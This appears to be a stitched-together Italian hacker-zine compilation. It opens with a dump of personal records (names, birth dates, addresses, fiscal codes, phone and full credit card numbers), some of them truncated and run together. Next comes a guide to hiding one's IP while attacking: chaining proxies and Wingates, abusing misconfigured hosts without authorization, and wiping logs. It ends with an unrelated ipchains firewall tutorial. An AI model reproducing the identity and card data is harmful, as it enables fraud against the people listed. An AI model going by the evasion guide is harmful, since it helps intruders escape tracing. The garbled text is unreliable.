CELLULARE N.     (Tim EuroBasic) 0335-9990487
CARTA DI CREDITO 4095 8594 5337 9809 (Banca : CARIPLO)
E-MAIL:          darrigoni@... 

NOME             Piero
COGNOME          Bonfanti
NATO IL          15 / 7 / 1945
A                Rapallo (GE)
RESIDENTE IN     Vicolo Croce 30
                 22030 Lasnigo (CO)
COD. FISCALE N.  BNF PRI 45L15 H183H
CELLULARE N.     (Tim EuroTime) 0338-4408500
CARTA DI CREDITO 4095 7843 7643 1133 (Banca : CARIPLO)
E-MAIL:          pbonfanti@... 

NOME             Alfredo
COGNOME          Ghiringhelli
NATO IL          20 / 11 / 1976
A                Alghero (SS)
RESIDENTE IN     Piazza XXII Maggio 26
                 00152 Roma (ROMA)
COD. FISCALE N.  GHR LRD 76S20 A192A
CELLULARE N.     (Tim EuroProf.) 0335-4559612
CARTA DI CREDITO 4095 0501 1616 8025 (Banca : CARIPLO)
E-MAIL:          aghiringhelli@... 

NOME             Giacomo
COGNOME          Rigamonti
NATO IL          2 / 12 / 1959
A                Lido di Camaiore (LU)
RESIDENTE IN     Via Napoli 16
                 94010 Pergusa (EN)
COD. FISCALE N.  RGM GCM 59T02 B455U
CELLULARE N.     (Tim EuroFamily) 0338-7536369
CARTA DI CREDITO 4095 8849 8508 3620 (Banca : CARIPLO)
E-MAIL:          grigamonti@... 

NOME             Maurizio
COGNOME          Ferro
NATO IL          2 / 11 / 1962
A                Turbigo (MI)
RESIDENTE IN     Vicolo Adige 12
                 74100 Taranto (TA)
COD. FISCALE N.  FRR MRZ 62S02 L471O
CELLULARE N.     (Tim EuroFamily) 0338-9900884
CARTA DI CREDITO 4095 4057 1722 7069 (Banca : CARIPLO)
E-MAIL:          mferro@... 

NOME             Gianpaolo
COGNOME          Caputo
NATO IL          17 / 11 / 1969
A                Conselve (PD)
RESIDENTE IN     Via Roma 20
                 90018 Termini Imerese (PA)
COD. FISCALE N.  CPT GPL 69S17 C964Q
CELLULARE N.     (Tim EurNOME             Emanuele
COGNOME          Stefanucci
NATO IL          11 / 8 / 1954
A                Varese (VA)
RESIDENTE IN     Viale Liberazione 6
                 39100 Bolzano (BZ)
COD. FISCALE N.  STF MNL 54M11 L682G
CELLULARE N.     (Tim EurNOME             Michele
COGNOME          Macchi
NATO IL          2 / 9 / 1943
A                Novi Ligure (AL)
RESIDENTE IN     Piazza XXII Maggio 20
                 94010 Pergusa (EN)
COD. FISCALE N.  MCC MHL 43P02 F965A
CELLULARE N.     (Tim EuNOME             Gianpaolo
COGNOME          Cavallo
NATO IL          17 / 9 / 1961
A                Novi Ligure (AL)
RESIDENTE IN     Corso Trento 28
                 15067 Novi Ligure (AL)
COD. FISCALE N.  CVL GPL 61P17 F965C
CELLULARE N.     (Tim EuroTime) 0338-4491289
CARTA DI CREDITO 4095 3937 4466 3680 (Banca : CARIPLO)
E-MAIL:          gcavallo@... 

NOME             Alessio
COGNOME          Robustelli
NATO IL          15 / 12 / 1952
A                Turbigo (MI)
RESIDENTE IN     Via Palermo 9
                 55043 Lido di Camaiore (LU)
COD. FISCALE N.  RBS LSS 52T15 L471C
CELLULARE N.     (Tim EuroBasic) 0335-2338266
CARTA DI CREDITO 4095 2791 5001 5954 (Banca : CARIPLO)
E-MAIL:          arobustelli@... 

NOME             Alex
COGNOME          Balducci
NATO IL          26 / 10 / 1962
A                Gravellona Toce (NO)
RESIDENTE IN     Via MonteRosa 15
                 00152 Roma (ROMA)
COD. FISCALE N.  BLD LXA 62R26 E153I
CELLULARE N.     (Tim EuroFamily) 0338-8214080
CARTA DI CREDITO 4095 7009 5907 8497 (Banca : CARIPLO)
E-MAIL:          abalducci@... 

NOME             Vittorio
COGNOME          Brambilla
NATO IL          9 / 6 / 1977
A                Bussolengo (VR)
RESIDENTE IN     Via Cavour 6
                 42030 Marola (RE)
COD. FISCALE N.  BRM VTR 77H09 B296X
CELLULARE N.     (Tim EuroFamily) 0338-4466908
CARTA DI CREDITO 4095 6149 2925 1383 (Banca : CARIPLO)
E-MAIL:          vbrambilla@... 

NOME             Gianni
COGNOME          Beretta
NATO IL          7 / 12 / 1954
A                Bologna (BO)
RESIDENTE IN     Piazza del Popolo 24
                 94010 Pergusa (EN)
COD. FISCALE N.  BRT GNN 54T07 A944W
CELLULARE N.     (Tim EuroTime) 0338-1096466
CARTA DI CREDITO 4095 8643 9551 6476 (Banca : CARIPLO)
E-MAIL:          gberetta@... 

NOME             Emanuele
COGNOME          Perego
NATO IL          9 / 12 / 1964
A                Bolzano (BZ)
RESIDENTE IN     Largo C. Menotti 19
                 55043 Lido di Camaiore (LU)
COD. FISCALE N.  PRG MNL 64T09 A952H
CELLULARE N.     (Tim EuroProf.) 0335-2877290
CARTA DI CREDITO 4095 0129 6608 5030 (Banca : CARIPLO)
E-MAIL:          eperego@... 

NOME             Francesco
COGNOME          Crippa
NATO IL          17 / 4 / 1950
A                Varese (VA)
RESIDENTE IN     Piazza del Popolo 21
                 55043 Lido di Camaiore (LU)
COD. FISCALE N.  CRP FNC 50D17 L682Z
CELLULARE N.     (Tim EuroProf.) 0335-7766738
CARTA DI CREDITO 4095 3540 8807 5071 (Banca : CARIPLO)
E-MAIL:          fcrippa@... 

NOME             Martino
COGNOME          Pasqualin
NATO IL          6 / 5 / 1978
A                Firenze (FI)
RESIDENTE IN     Viale Milano 28
                 74100 Taranto (TA)
COD. FISCALE N.  PSQ MTN 78E06 D612J
CELLULARE N.     (Tim EuroTime) 0338-4969434
CARTA DI CREDITO 4095 6260 9662 6999 (Banca : CARIPLO)
E-MAIL:          mpasqualin@... 

NOME             Franco
COGNOME          Mastrandrea
NATO IL          2 / 4 / 1974
A                Bussolengo (VR)
RESIDENTE IN     Via Petrarca 25
                 90018 Termini Imerese (PA)
COD. FISCALE N.  MST FNC 74D02 B296K
CELLULARE N.     (Tim EuroBasic) 0335-5884229
CARTA DI CREDITO 4095 2873 4601 4047 (Banca : CARIPLO)
E-MAIL:          fmastrandrea@... 

NOME             Giovanni
COGNOME          Scotti
NATO IL          28 / 8 / 1968
A                Porto Recanati (MC)
RESIDENTE IN     Piazza della Repubblica 25
                 14036 Moncalvo (AT)
COD. FISCALE N.  SCT GNN 68M28 G919W
CELLULARE N.     (Omnitel Libero) 0347-2911167
CARTA DI CREDITO 4095 5486 7474 0267 (Banca : CARIPLO)
E-MAIL:          gscotti@... 

NOME             Luigi
COGNOME          Caputo
NATO IL          5 / 11 / 1951
A                Cavallino (VE)
RESIDENTE IN     Viale Liberazione 1
                 20029 Turbigo (MI)
COD. FISCALE N.  CPT LGU 51S05 C377W
CELLULARE N.     (Omnitel Libero) 0347-4615041
CARTA DI CREDITO 4095 5649 7814 7422 (Banca : CARIPLO)
E-MAIL:          lcaputo@... 

NOME             Gianpaolo
COGNOME          Martini
NATO IL          25 / 7 / 1965
A                Gravellona Toce (NO)
RESIDENTE IN     Via Alfieri 9
                 60022 CastelFidardo (AN)
COD. FISCALE N.  MRT GPL 65L25 E153U
CELLULARE N.     (Tim EuroBasic) 0335-2150700
CARTA DI CREDITO 4095 5496 7462 1432 (Banca : CARIPLO)
E-MAIL:          gmartini@... 

NOME             Emanuele
COGNOME          Grisetti
NATO IL          12 / 8 / 1971
A                Villanovafranca (CG)
RESIDENTE IN     Vicolo Croce 9
                 90018 Termini Imerese (PA)
COD. FISCALE N.  GRS MNL 71M12 L987E
CELLULARE N.     (Omnitel Libero) 0347-3864265
CARTA DI CREDITO 4095 9954 3804 7812 (Banca : CARIPLO)
E-MAIL:          egrisetti@... 

NOME             Giulio
COGNOME          Brambilla
NATO IL          10 / 10 / 1949
A                Conselve (PD)
RESIDENTE IN     Via Roma 11
                 50020 Romola (FI)
COD. FISCALE N.  BRM GLI 49R10 C964P
CELLULARE N.     (Tim EuroBasic) 0335-4530817
CARTA DI CREDITO 4095 3094 3583 1634 (Banca : CARIPLO)
E-MAIL:          gbrambilla@... 

NOME             Alex
COGNOME          Martini
NATO IL          27 / 1 / 1945
A                Villanovafranca (CG)
RESIDENTE IN     Via Petrarca 28
                 20029 Turbigo (MI)
COD. FISCALE N.  MRT LXA 45A27 L987U
CELLULARE N.     (Tim EuroFamily) 0338-9876733
CARTA DI CREDITO 4095 4099 0734 8313 (Banca : CARIPLO)
E-MAIL:          amartini@... 

NOME             Massimo
COGNOME          Rigoli
NATO IL          20 / 12 / 1977
A                Pragelato (TO)
RESIDENTE IN     Via Ragazzi del 99 7
                 06024 Gubbio (PG)
COD. FISCALE N.  RGL MSM 77T20 G973G
CELLULARE N.     (Tim EuroTime) 0338-6418805
CARTA DI CREDITO 4095 3913 8758 4668 (Banca : CARIPLO)
E-MAIL:          mrigoli@... 

NOME             Francesco
COGNOME          Arrigoni
NATO IL          22 / 5 / 1955
A                Lido di Camaiore (LU)
RESIDENTE IN     Largo Garibaldi 25
                 54037 Marina di Massa (MC)
COD. FISCALE N.  RRG FNC 55E22 B455Z
CELLULARE N.     (Tim EuroTime) 0338-3269732
CARTA DI CREDITO 4095 9731 2835 6173 (Banca : CARIPLO)
E-MAIL:          farrigoni@... 

NOME             Matteo
COGNOME          Chilin
NATO IL          27 / 10 / 1944
A                Cavizzana (TN)
RESIDENTE IN     Piazza Indipendenza 28
                 37012 Bussolengo (VR)
COD. FISCALE N.  CHL MTT 44R27 C400J
CELLULARE N.     (Tim EuroFamily) 0338-3238370
CARTA DI CREDITO 4095 9962 3277 3561 (Banca : CARIPLO)
E-MAIL:          mchilin@... 

NOME             Pasquale
COGNOME          Francisci
NATO IL          9 / 9 / 1977
A                Turbigo (MI)
RESIDENTE IN     Via Alfieri 28
                 06024 Gubbio (PG)
COD. FISCALE N.  FRN PQL 77P09 L471B
CELLULARE N.     (Omnitel Libero) 0347-9234489
CARTA DI CREDITO 4095 3731 3438 0699 (Banca : CARIPLO)
E-MAIL:          pfrancisci@... 

NOME             Silvano
COGNOME          Ferrazzi
NATO IL          11 / 7 / 1968
A                Porto Recanati (MC)
RESIDENTE IN     Via Palermo 6
                 22030 Lasnigo (CO)
COD. FISCALE N.  FRR SVN 68L11 G919A
CELLULARE N.     (Tim EuroTime) 0338-3385695
CARTA DI CREDITO 4095 3146 8614 2038 (Banca : CARIPLO)
E-MAIL:          sferrazzi@... 

NOME             Stefano
COGNOME          Rigamonti
NATO IL          27 / 12 / 1948
A                Porto Recanati (MC)
RESIDENTE IN     Via Alfieri 30
                 56030 Selvatelle (PI)
COD. FISCALE N.  RGM SFN 48T27 G919T
CELLULARE N.     (Tim EuroProf.) 0335-3831646
CARTA DI CREDITO 4095 1351 4903 8293 (Banca : CARIPLO)
E-MAIL:          srigamonti@... 

NOME             Andrea
COGNOME          Ferro
NATO IL          2 / 5 / 1949
A                Pragelato (TO)
RESIDENTE IN     Piazza XXII Maggio 7
                 06024 Gubbio (PG)
COD. FISCALE N.  FRR NDR 49E02 G973S
CELLULARE N.     (Tim EuroBasic) 0335-1164522
CARTA DI CREDITO 4095 5097 0999 1911 (Banca : CARIPLO)
E-MAIL:          aferro@... 

NOME             Alessandro
COGNOME          Brusoli
NATO IL          23 / 6 / 1942
A                Alghero (SS)
RESIDENTE IN     Via Isonzo 5
                 60022 CastelFidardo (AN)
COD. FISCALE N.  BRS LSN 42H23 A192M
CELLULARE N.     (Tim EuroBasic) 0335-6473458
CARTA DI CREDITO 4095 5952 2036 6360 (Banca : CARIPLO)
E-MAIL:          abrusoli@... 

NOME             Oscar
COGNOME          Fanton
NATO IL          4 / 2 / 1950
A                Bologna (BO)
RESIDENTE IN     Vicolo Mazzini 3
                 50014 Fiesole (FI)
COD. FISCALE N.  FNT SCR 50B04 A944G
CELLULARE N.     (Tim EuroTime) 033NOME             Giacomo



0x00.3 Proxy
------------
Uno dei problemi principali del newbie e del wannabe e' come nascondere o
cambiare il proprio ip durante la navigazione o per entrare in IRC.
I browser (Explorer, Netscape) prevedono l'uso di "proxy", ovvero computer che
si frappongono tra noi e il resto della rete; quando cerchiamo di recuperare
una pagina sul web, il nostro browser contattera' il proxy, e sara' quindi
quest'ultimo a "prelevare" il documento html e a inviarlo a noi; vantaggio di
questa operazione e' che l'ip loggato dal server di destinazione (dove
abbiamo prelevato la pagina)  sara' quello del proxy e non il nostro.
Attenzione pero': non tutti i proxy sono anonimi. Questo significa che in alcuni
casi il proxy lascia "filtrare" il nostro ip reale che restera' nei log del
server. Prima di usare un proxy, ci si doverebbe sempre assicurare che si tratta
di un proxy anonimo che non rivela il nostro ip. Questo testo puo' essere
effettuato collegandosi a http://www.anonymizer.com/snoop.cgi, una pagina
che fa un test sul grado di anonimato del nostro sistema.
Comunque anche utilizzando un proxy anonimo non vi dovete sentire sicuri, anzi.
Sarebbe opportuno concatenare due o piu' proxy prima di collegarsi al vero
obbiettivo. Come ? Innanzitutto questa tecnica funziona solo con alcuni tipi
di proxy, i Delegate; quando avete trovato alcuni Delegate, dovete mettere
nella barra del browser la seguente stringa:
http://proxy1.url:port/-_-http://proxy2.url:port/-_-
dove proxy1,proxy2 e proxy3 sono gli indirizzi dei proxy Delegate che avete trovato.
Ricordate: piu' proxy mettete, piu' diminuiscono le probabilita' di essere
rintracciati, ma aumenta anche il tempo di latenza, rallentando la
navigazione.
Ma anche i proxy loggano...
Io vi consiglio di concatenare quanti + possibili proxi, in rete trovate una lista 
completa di migliaia di server, esempio (porta 8088):

proxy.sce.com
proxy.speedware.com
proxye1-atm.elp.rr.com
proxye1-atm.maine.rr.com
proxye2-atm.elp.rr.com
209.20.42.6
210.131.240.3
210.140.48.2
210.145.39.211
210.160.178.46
210.161.225.164
210.163.132.10
210.170.69.146
proxy3.emirates.net.ae
proxyf.emirates.net.ae
proxye3-atm.elp.rr.com
proxye3-atm.maine.rr.com
proxye4-atm.elp.rr.com
proxye4-atm.maine.rr.com
proxye2-atm.nycap.rr.com
proxye2-atm.san.rr.com
proxye3-atm.nycap.rr.com
proxye3-atm.san.rr.com
proxye4-atm.nycap.rr.com
proxye4-atm.san.rr.com
proxyi.emirates.net.ae
proxyj.emirates.net.ae
proxyk.emirates.net.ae
proxy4.emirates.net.ae
cache02.netway.at
www-proxy.tecan.co.at
basil.acr.net.au
proxy.gwbbs.net.au
proxy.newave.net.au
cvs2.kyunghee.ac.kr
www.pt.lu
proxyone.cowles.com
relay1.kemmunet.net.mt
proxy.vt.com
tenaga.tnb.com.my
proxy2.lsil.com
cache-1.golden.net
titan.datainternet.com
cache2.bora.net
be3334.schering.de
proxy.golden.net
bibo.fz.uni-lueneburg.de 

E dopo la lista eccovi un bel URL che vi interesser sicuramente :
http://tools.rosinstrument.com/proxy/

0x00.4 Socks
------------
Nelle reti protette da firewall gli host interni entrano in Internet attraverso
un servizio speciale: Socks.
Questo protocollo la cui porta di default e' la 1080, permette alle applicazioni
che lo supportano  di collegarsi a Internet in modo indiretto, con il firewall
che fa da tramite. Il principio e' lo stesso del proxy per http, ma il range
di applicazioni e' piu' vasto. In pratica ogni applicazione che supporta Socks,
puo' collegarsi a Internet tramite Socks. Il vantaggio e' come al solito che
l'ip che appare non e' piu' il nostro ip reale, ma quello del firewall; inoltre
nuke & DoS vari del lamer di turno saranno diretti al firewall, lasciando
del tutto indifferente la nostra macchina!
L'utilizzo dei Socks e' classico nel mondo di IRC, ma puo' essere utilizzato
anche con altre applicazioni; Volete proprio usare il Netbus? Ok, ma almeno
non fatevi beccare subito con il vostro ip vero... usate un Socks. Volete
fare del port-surfing manuale con il Telnet? Usate Socks...
Certo, non tutti i programmi prevedono l'uso di Socks (per esempio, il Telnet di
serie di Windows non lo supporta), ma grazie a un programma tipo SocksCap si
puo' fare in modo che TUTTI i programmi di rete (compreso il Telnet standard di
Windows) possano collegarsi in modo "anonimo". In questo modo e' possibile
anche inviare email tramite Outlook o Eudora senza la paura di esporre il
nostro ip reale, ma quello per esempio di un computer del governo di Taiwan...

0x00.5 Wingate
--------------
Wingate e' un porgramma per Windows che permette di collgare piu' macchine
tramite una sola connesisone Internet, tramite le funzioni di proxy http,
Socks, proxy ftp, telnet...
In Internet si trovano molti Wingate mal configurati che permettono l'accesso
anche a utenti non autorizzati (noi!). Il meccanismo e' quello visto il precedenza
per i proxy e i Socks (ovvero l'ip che viene lasciato in giro e'quello del
Wingate e non il nostro), ma ha una modalita' di utilizzo diversa.
Lanciate il Telnet e collegatevi alla porta 23 del Wingate, se tutto e' Ok
avrete un prompt del genere:
Wingate>
a questo punto mettete l'indirizzo dell'host al quale vi volete collegare, segutio
dal numero di porta:
Wingate>bill.whitehouse.gov 23 (Naturalmente sto scherzando: lasciate stare i
.gov...)
a questo punto il vostro ip e' al sicuro (relativamente, come sempre).
Anche nel caso dei Wingate e' buona norma concatenare piu' Wingate tra di
loro, cosi:
quando avete il prompt del Wingate (Wingate>) inserite l'indirizzo di un altro
Wingate,e poi un altro... infine l'indirizzo dell'host da attaccare.
Certo aumenta il lag, ma e' sempre meglio che andare in galera...

0x00.6 Trovare Proxy, Socks & Wingate
-------------------------------------
Altro problema annoso del novello "hacker": dove li trovo i proxy & i Wingate ?
Esistono diversi modi per procurarsi questi indirizzi. Il piu' immediato
(e il meno redditizio) e' quello di andare su uno di quei siti che pubblicano
liste di proxy e socks (proxy4all.cgi.net, la sezione apposita in
www.cyberarmy.com e altri...). Il problema e' che questi proxy durano pochissimo
o non funzionano affatto... Conviene arrangiarsi in altro modo.
Procuriamoci uno scanner e lanciamolo in giro x la rete, prima o poi qualcosa
troviamo.

Per informazione, le porte su cui trovare qualcosa sono le seguenti:
8080    proxy http
3128    proxy http
81      proxy http
1080    Socks

Un altro modo efficace x trovare Socks e' quello di entrare in IRC e dare il
comando
/stats k
per avere la lista dei k-line, ovvero la lista di host "bannati". Molti host
della lista saranno Socks bannati da quel server ma perfettamente funzionanti
x altri scopi!

Siete pigri e non avete voglia di cercare? Aspettate che i Socks vengano a voi!
Lanciate il Nukenabber e navigate tranquillamente (oppure andate su un canale
molto frequentato in IRC); Alla fine della serata date uno sguardo al log del
Nukenabber: tra i vari tentativi di lamer con BO & Netbus, forse ci sara' anche
qualche indirizzo di Socks utilizzabile...

Altre tecniche potete trovarle nel mio articolo "Gabole nella Rete", reperibile
sul mio sito e sul numero 0 di "Lightz".

0x00.7 Pericoli
---------------
Per iniziare bisogna dire che NESSUNA tecnica qui esposta garantisce l'anonimato
assoluto, esiste sempre un margine di pericolo.
Dal momento della connessione dial-up con il provider alla connessione tramite
TCP/IP in Internet, lasciamo un mare di tracce ovunque.
La compagnia telefonica ha sempre e comunque il nostro vero numero, anche se
usiamo il BIC. I vari proxy che usiamo molto probabilmente (anzi, sicuramente)
loggano tutto il traffico, cosi'come i Socks: forse c'e' qualche speranza con
i Wingate. Assolutamente da evitare gli host "boservizzati" o cmq "trojanizzati".
Forse il metodo piu' sicuro e' quello di essere root su di un sistema e avere la
la possibilita' di "ripulire" per bene i log.
Da non dimenticare poi la possibilita' di mettere nei guai gli ignari possessori
di host compromessi (ancora una volta: trojan e backdoor varie) o i responsabili
dei sistemi che usiamo per "rimbalzare" (Wingate, proxy...).







sYn -testo adattato-     <---w w w . h a c k e r s a t . c o m---><---syn@hackersat.com---> 



              -!--!--!--!--!--!--!--!--!--!--!--!--!--!--!--!-
                            GUIDA PRATICA ALL'USO DI IPCHAINS                
              				    		                         kEwL 
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Guida Pratica allUso di ipchains
By Ghost Rider
Tradotto da kEwL` <kewl@penguinpowered.com>

Introduzione
Come puoi vedere nel titolo, questa  una guida pratica, cos puoi mettere da parte tutti 
quei dubbi tecnici. Il mio obiettivo  di fornire delle informazioni alle persone normali 
che non sanno dove cominciare nel settare un firewall con ipchains sul loro computer o sul-
la LAN. Prendi qualcosa da mangiare e un po di caff e comincia a scalare la collina, 
ehm...teso.
Cominciamo a leggere qualcosa di utile, ok?

Basi necessarie

 Policy di Rete
La prima che devi pensare  che policy vuoi usare [per policy si intende un metodo da uti-
lizzare nellinstallare il firewall...se continui a leggere ti sar pi chiaro]. Ci sono due 
tipi di policy, il policy Accetta e il policy Rifiuta. Nel policy Accetta tutto quello che 
non  specificato per rifiutare sar accettato, altrimenti nel policy Rifiuta tutto sar 
rifiutato, tranne quello che hai escluso.
Nella mia opinione il policy migliore  il policy rifiuta, poich devi solo aggiungere i 
servizi che non vuoi dare, e tutto il resto sar rifiutato. Il policy accept potrebbe aver 
bisogno di alcuni rules di filtro, poich devi specificare tutto quello che non vuoi bloc-
care.

 Chains e Rules
Se non sai per cosa stanno queste due parole, avrai problemi a capire il funzionamento di 
ipchains. 
   
 Chains   
Ci sono 4 tipi di chains; focalizziamo sui primi 3 cos puoi capire cos un chain. Quando 
un pacchetto sta cercando di entrare nellinterfaccia di rete, esso passer attraverso il 
chain input; se il pacchetto sta cercando di uscire dallinterfaccia di rete, esso passer 
attraverso il chain output; se il pacchetto sta cercando di "saltare" da uninterfaccia 
ad unaltra passer attraverso il chain forward. Quello che sto cercando di dire  questo:

- Quando un pacchetto cerca di accedere alla nostra rete dovr passare attraverso il chain 
input;
- Quando un pacchetto cerca di lasciare la nostra rete dovr passare attraverso il chain 
output;
- Quando un pacchetto cerca di saltare da uninterfaccia ad unaltra (se non capisci questa 
parte, immagina lip forward,  realizzato in questo chain) dovr passare attraverso il 
chain forward.
Il 4 chain  il chain definito dallutente, dove puoi creare il tuo chain. 
         
In ognuno di questi chains dovrai definire che policy userai. Ci sono 3 possibili policy:

Per usare il policy accetta userai il policy ACCEPT.
Per usare il policy rifiuta puoi usare i seguenti policy:
- DENY
- REJECT

Qual  la differenza tra questi due policy?
Se usi il policy DENY i pacchetti che non sono permessi saranno scartati dal kernel, senza 
riferire allhost remoto che il pacchetto  stato scartato. Questo  buono, perch il tuo 
sistema non spreca risorse, e non far vedere allhost remoto che il pacchetto  stato ri-
fiutato, e questo  positivo soprattutto se c qualcuno che sta cercando di hackare il tuo 
sistema.
Se usi il policy REJECT, i pacchetti che non sono permessi saranno anche scartati ma verr 
generato un errore ICMP generato dal kernel e mandato allhost remoto. Questo ridurr le 
risorse di sistema, che ruberanno molto tempo.
Il mio consiglio  di usare il policy DENY al posto del REJECT. Ci sar uneccezione ma ne 
parleremo pi tardi.

 Rules
Abbiamo parlato dei chains, ma solo i chains non filtrano i pacchetti, i chains hanno solo 
i policy. I rules controllano il flusso dei pacchetti attraverso i chains. Possiamo vedere 
un rule come un gruppo di condizioni e un obbiettivo. Il gruppo di condizioni  usato per 
confrontare solo un tipo di pacchetti, lobbiettivo definir cosa succeder ai pacchetti 
che confronter il gruppo di condizioni.
Nei rules puoi anche usare ACCEPT, REJECT e DENY. Questo accetter, respinger (REJECT) o 
rifiuter (DENY) i pacchetti che coincidono con le condizioni di quei rules, e in questo 
caso il policy del chain non influenzer, poich c un rule apposta per quel pacchetto.
Se non c un rule per il pacchetto, sar applicato ad esso il policy del chain.
Il mio consiglio  di usare sempre DENY, perch non spreca le risorse del sistema come fa 
REJECT. Ma ricorda che se ti stai connettendo a SMTP, aggiungi un rule REJECT alla porta 
113 (auth). Perch? Perch quando ti connetti al server SMTP, il server remoto cercher di 
connettersi alla tua porta auth per sapere chi sei, e se metti DENY il pacchetto sar scar-
tati "silenziosamente" cos il server SMTP aspetter fino al timeout per procedere, e 
questo pu impiegare circa 1 o 2 minuti. Cos se setti il rule REJECT alla porta 113, quan-
do SMTP cerca di connettersi riceve un errore e proceder senza dover aspettare.
 meglio vero?
Lultima cosa che dovresti sapere sui rules  che verr verificato il primo rule, e il pro-
cesso verr bloccato per quel pacchetto. Questo significa che se prima hai detto di blocca-
re tutte le porte da 10 a 100 e nel rule dopo permetti la connessione alla porta 22, il se-
condo rule non avr effetto perch la 22  compresa tra la 10 e la 100, e cos solo il pri-
mo sar valido.

Ora parleremo dellultima cosa in questa sezione e cominceremo con i comandi ipchains per 
costruirci il nostro firewall. Bello vero?
E lultimo argomento  ...(rullo di tamburi)... 
 
 Ip e Masking  
Perch masking [letteralmente mascherare]? Perch il masking pu essere molto utile nei ru-
les. Se qualcuno di voi ha detto perch masking, qualcun altro ha detto cos il masking?

Poich largomento masking potrebbe occupare un intero documento, o anche un libro, ripor-
ter un brevissimo riassunto che sar sufficiente per farti capire come funziona.
Un indirizzo IP  costruito di 4 campi, ognuno separato dallaltro con un punto. Esempio:

	IP: 193.34.13.15 - questo IP pu anche essere scritto
11000001.00100010.00001101.00001110

In un IP alcuni di questi campi rappresentano la mask di rete e il resto di esso rappresen-
tano la host mask.
Il masking ci dice quanti bit sono fissati, e quanti non lo sono. Questo significa che 
0.0.0.0/0 pu significare ogni indirizzo IP, e 134.34.12.12/32 pu significare solo 
134.34.12.12 ma 134.34.12.0/24 pu significare gli IP da 134.34.12.0 a 134.24.12.255.
   
Il segreto per capire ci  pensare gli ip in forma binaria e non decimale. 
  
Bene penso che siete preparati per cominciare con ipchains. Che ne dite? Cominciamo?

Ipchains: Finalmente!!!
 
Penso che il miglior modo di parlare della sintassi di ipchains e delle configurazioni  
scrivere uno script ipchains. Ci saranno due scripts, uno per lo il computer standalone 
(che sta da solo) e un altro per un firewall che coprir unintera rete. Ci saranno i com-
menti cos potete capire.
   
---- Lo script comincia qu ---

#!/bin/bash

# ipchains script scritto da Ghost_Rider
# usato come esempio in Guida Pratica allUso di ipchains
 

IPCHAINS ="/sbin/ipchains" 


# Per prima cosa scriveremo tutti i rules. Questo ci assicurer che i vecchi rules che 
# possono essere qui non sono usati altrove.

$IPCHAINS -F input 
$IPCHAINS -F output
$IPCHAINS -F forward
    
   
# Ora settiamo i policy.
# Il policy Deny per input e forwarding (questo sar un computer standalone)
# Policy Access per output
# Nota: il policy deve essere in maiuscolo altrimenti non funzionerrk

$IPCHAINS -P input DENY     
$IPCHAINS -P output ACCEPT 
$IPCHAINS -P forward DENY


# Tutto il traffico localhost sar accettato cos aggiungiamo la seguente linea

$IPCHAINS -A input -i lo -j ACCEPT

# Questo significa:
# -A: aggiunge un rule al chain, in questo caso il chain input
# -i: dice che interfaccia filtrare, in questo caso lo (loopback), questo significa il 
# traffico localhost
# -j: dice cosa fare con il pacchetto (policy del rule)


# Permettiamo ai pacchetti con connessioni stabilite di procedere.
# Quello che fa  controllare se il pacchetto ha il flag syn, perci mettiamo ! -y che sta 
# per negazione di -y
# Ma questa richiesta pu essere falsificata. Non  difficile costruire il pacchetto.

$IPCHAINS -A input -i ppp0 -p tcp ! -y -j ACCEPT


# ppp0:  linterfaccia di connessione ppp
# -p: sceglie il protocollo per quel rule, in questo caso tcp
# -y: controlla se i pacchetti hanno il flag syn o no.
# !: nega lopzione, in questo caso -y


# Accettiamo le risposte DNS 
 
$IPCHAINS -A input -i ppp0 -p tcp -sport 53 -j ACCEPT
$IPCHAINS -A input -i ppp0 -p udp -sport 53 -j ACCEPT

# Permettiamo le connessioni a ssh

$IPCHAINS -A input -i ppp0 -p tcp --dport 22 -j ACCEPT


# --dport: dice la porta di destinazione, in questo caso la 22
# puoi anche usare --sport per la porta sorgente (porta dalla macchina remota).

# Respingiamo la connessione auth
# Se non sai perch stiamo facendo ci, rileggi la sezione rule.

$IPCHAINS -A input -i ppp0 -p tcp --dport 113 -j REJECT


# Permettiamo alcuni tipi di ICMP.
# il tipo 0  echo reply (cos puoi ricevere le risposte dei ping che mandi)
# il tipo 3  Destination Unreachable (cos non devi aspettare i timeout)
# il tipo 11  Time Exceed (usato per il traceroute) 


$IPCHAINS -A input -i ppp0 -p icmp --dport 0 -j ACCEPT
$IPCHAINS -A input -i ppp0 -p icmp --dport 3 -j ACCEPT
$IPCHAINS -A input -i ppp0 -p icmp --dport 11 -j ACCEPT

# NOTA: probabilmente stai pensando "perch metto le porte destinazione se icmp non ha
# porte?"
# Bene se osservi bene, il --dport specifica il tipo di icmp.
# S...In ipchains il --dport quando il protocollo  icmp chiama il tipo icmp. Non
# dimenticarlo.


# Ora vediamo tutto quello che ci colpisce e loggiamolo.

$IPCHAINS -A input -j DENY -l 

# Come hai letto nella sezione rule il primo che confronta vince e lanalisi degli altri
# rule non verr fatta. Cos quello che facciamo qui  se il pacchetto che ci ha colpito
# non  stato accettato dagli altri rules,  perch  qualcosa che vogliamo rifiutare ma  
# meglio loggare e quindi usiamo lopzione -l
# Se non vuoi loggare questi pacchetti non hai bisogno di mettere questo rule, poich il 
# policy di chain inuput  DENY cos il pacchetto sar scartato, ma non loggato.


--- Lo script finisce qu -----

Ora vediamo uno script di un firewall che sarebbe anche per una macchina per lip masquera-
ding.
Alcuni rules non avranno commenti dettagliati come nel primo script poich li hai gi.
Facendo ci sto supponendo che il firewall ha due interfaccie, la ppp0 che lo connette ad 
internet e la eth0 che lo connette con la LAN.

---- Lo script comincia qu ----


# Script di ipchains scritto da Ghost Rider usato come esempio in
# Guida Pratica allUso di Ipchains 


IPCHAINS = "/sbin/ipchains"

# Scriviamo i rules

$IPCHAINS -F input
$IPCHAINS -F output
$IPCHAINS -F forward


# Setta la policy
# input user DENY
# output e forward user ACCEPT

$IPCHAINS -P input DENY
$IPCHAINS -P output ACCEPT
$IPCHAINS -P forward ACCEPT


# Permette il traffico locale


$IPCHAINS -A input -i lo -j ACCEPT
$IPCHAINS -A input -i eth0 -j ACCEPT 


# eth0 sta per linterfaccia con la prima scheda ethernet


# Ora blocchiamo gli indirizzi IP privati che dovrebbero entrare con ppp0

$IPCHAINS -A input -i ppp0 -s 10.0.0.0/8 -j DENY
$IPCHAINS -A input -i ppp0 -s 172.16.0.0/12 -j DENY
$IPCHAINS -A input -i ppp0 -s 192.168.0.0/16  -j DENY

# Ora perch blocchiamo questi indirizzi ip?
# Bene questi 3 indirizzi di rete sono ip ristretti che sono usati per scopi interni
# Questo significa che nessun host in internet pu avere quegli ip
# Cos  un po strano se vengono da ppp0, sembra come se qualcuno volesse spoofarsi
